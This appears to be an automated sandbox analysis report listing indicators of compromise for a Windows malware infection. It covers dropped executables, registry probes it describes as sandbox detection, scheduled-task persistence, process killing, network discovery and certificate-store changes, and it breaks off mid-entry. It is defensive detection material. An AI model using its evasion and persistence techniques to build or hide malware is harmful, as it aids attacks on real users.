description ioc Process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe exJBBJ57RhMwfX6V7rNCirtY.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\System\xxx1.bak YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\Tasks\1b8d5943a444c5795689ec0f44e1ef6740db92da exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\System\svchost.exe YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\System\svchost.exe YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\f8c8f1285d826bc63910aaf97db97186ba642b4f exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 2620 300 WerFault.exe 148 3640 300 WerFault.exe 148 4872 300 WerFault.exe 148 3256 300 WerFault.exe 148 3136 300 WerFault.exe 148 4092 300 WerFault.exe 148 5404 5168 WerFault.exe 193 5592 5168 WerFault.exe 193 5656 5168 WerFault.exe 193 5700 5168 WerFault.exe 193 5760 5168 WerFault.exe 193 5900 5168 WerFault.exe 193 5936 5168 WerFault.exe 193 5960 5168 WerFault.exe 193 -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000400000001ac1b-245.dat nsis_installer_1 behavioral1/files/0x000400000001ac1b-245.dat nsis_installer_2 behavioral1/files/0x000400000001ac1b-246.dat nsis_installer_1 behavioral1/files/0x000400000001ac1b-246.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Soft1WW02.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 32E4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RYVmga2gCYCILuVDQzIlK5af.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mt5IRqNxCvOuLR7GM_no0d2t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mt5IRqNxCvOuLR7GM_no0d2t.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Soft1WW02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 32E4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RYVmga2gCYCILuVDQzIlK5af.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4052 schtasks.exe 896 schtasks.exe 4484 schtasks.exe 2192 schtasks.exe 4244 schtasks.exe 5720 schtasks.exe 1536 schtasks.exe 2372 schtasks.exe 3196 schtasks.exe 3024 schtasks.exe 2300 schtasks.exe 1828 schtasks.exe 2112 schtasks.exe 4304 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 6100 timeout.exe 5520 timeout.exe 2832 timeout.exe 3272 timeout.exe 1288 timeout.exe 3056 timeout.exe 500 timeout.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 6964 net.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 6188 ipconfig.exe 6912 netstat.exe -
Kills process with taskkill 10 IoCs
pid Process 2012 taskkill.exe 1500 taskkill.exe 4336 taskkill.exe 5572 taskkill.exe 3696 taskkill.exe 6108 taskkill.exe 4832 taskkill.exe 3236 taskkill.exe 5000 taskkill.exe 3328 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fdbf666f9714cd0a44740d27820ba320ffa191ffb392cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c72b230f3e64cedb27bc7197b69f0ad0c2a30f9e5fc9986d1844ad381b6701184ca1e9a8a98de279d93b043a834a3497c00c58ceb387df54244ec3ad3eec58be018e51364df7492226b73f8909d7ff0c9a7b19a68b1089ddf9d6 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f639b16cd0a44740d27820ba320ffa191fbb593cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\f9dbda9e = a3927173261beaf0674cadce3dcb504c42e5336165cda5f0e7f365c0e5c68a5a2f6afc16c07120d5891b637569979afad8dd25cd29d7e15467937e2c2ab17473dd1a1509774756f48eece6e3dddd7341378a9937530b8228880ada7e explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\f9dbda9e = a3927173261be756674cadce3dcb504c42e5336165cda5f0e7f365c0e5c68a5a2f6afc16c07120d5891b637569979afad8dd25cd29d7e15467937e2c2ab17473dd1a1509774756f48eece6e3dddd7341378a9937530b8228880ada7e explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\74f86db5 = 211dd65cd9c0d13f6a685154ef9c8047d8105dac146233975bd659de2f6a8d344a2f6d4e83ea2a0a540e5de6fd75d905d2b0ffb0cb5102d5ed3cec706e8e0bb799ff50b7d3ac0f133f1816fbd196abab85ceae4f7875e18bfafa1417d7a54fcc20e3d5696db849be explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fdbf666f9714cd0a44740d27820ba320fea898f7b395cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c73c230f3e51c97b59cb7ef36af7b7646795128501467f0b29863dac8583d6d29960fa4020f602ba9063839a3b0adb37f8f243f20517af4a13a4898b570771937db4966e113353b7f9ceccb17a6400ed029623d243c5ad22405ef1d8488abc8526769c25dd6f3561d779328634ef07 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c73c230f3e51c97b59cb7ef36af7b7646795128501467f092a813dac8583d6d29960fa4020f602ba9063839a3b0adb37f8f243f20517af4a13a4898b570771937db4966e113353b7f9ceccb17a6400ed029623d243c5ad22405ef1d8488abc8526769c25dd6f3561d779328634ef07 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\4167bdfb = 00a419d3dae80a470da2c9d59995d8693c1cc9843159b9 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\b9360293 = 3fc3509086e542aef6c633387b891d6675e316f5ed49bd727fdf6d9a3710c24d9fb4635c27b9d6aafdbf47a01905e26fb5bc12872e7eb387dfdff7264bdfa6e6c5fec1c85444269a466fc2f287f9603000ca62dc1b99991c75d26227649790e14ceabb7d0b2691d64f135498 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f649411cd0a44740d27820ba320ffa191fdb491cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\8692b568 = 6b94ba011c03ddeb94f2dde6e1ac30d1cc2429638f6f44b3050a4d37bfca582d0d8d34198d074f4d8bd1b1fb039d3de7691ea2559afe3dcf3e60044fbfeaf85f420b419045b808bb9d7a06697887d0194e172453 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\3c6ff271 = 6cb8812219223d3592780f21580fbf6bfe06f7c46a1eac36573d026032865c558ac98ecda575c4e2296d95698654dc299f97c5dfe358615bd12cf79bb5c25e1a949bfce535a8c52886c525163e8dd89481fa5581b4192e explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\8692b568 = 6b94ba011c0386e594f2dde6e1ac30d1cc2429638f6f44b3050a4d37bfca582d0d8d34198d074f4d8bd1b1fb039d3de7691ea2559afe3dcf3e60044fbfeaf85f420b419045b808bb9d7a06697887d0194e172453 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f639b16cd0a44740d27820ba320ffa191f9b692cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mx.gearbest.com\ = "238" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000efb2a684f70187d265f1f86a2090dab1676e3fa9989fe328f4a7aedaaaba96cc6cfe82d448c0e3077ad50a9dad8280dc38b65a39e6680c42ea6c133b010c0c86082a0c7560dc4ca2f0a2b4abf6baa4209e2e60079b9e0357f4ea949c3632d13025d71ff6cb743ad158f9d46d78579cc85b78ebbbb26160d1adc1088fbc4d72b68fa58bc716aa2eb28178ffc040796aaa0333e82cbad15728fc91a6c8637e37a1b6340554d09c3c0492c0d4e23e40425d98fea9bc870e3fb94efa689d08e363aee8245a2b0b6c7ea666724116b6cb31be127b53cf8c38f170489c3103a59db6c43616003dec384be8fb2cd78bdd3cb0c2ba48004ad26f06434d174d2cdccc632b2fa8ff223622ecac2190c89214b2849ed307a529e0d3bb731a0b4ba953917c19797b9f7ad7489855ee3cfe434b4d0a3a2657c22091840aae7c18b8220f0aef8e402feb527bcc098b82d18740912c67f390d7ce4dbea202f077de9e9ec7582e8481649ea081cc1cc614f03702c3719ab2fe29acfa974dd43f9ffcd8578e9bd866bcba8ed0236affb3a237dab4fd3bfb5341ec8272f4a528348656fa472186789993b6bb79eda0 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\gearbest.com\Total = "317" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "120" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\gearbest.com\NumberOfSubdomai = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 306b7ebd32c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.gearbest.com\ = "239" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\Certif MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value 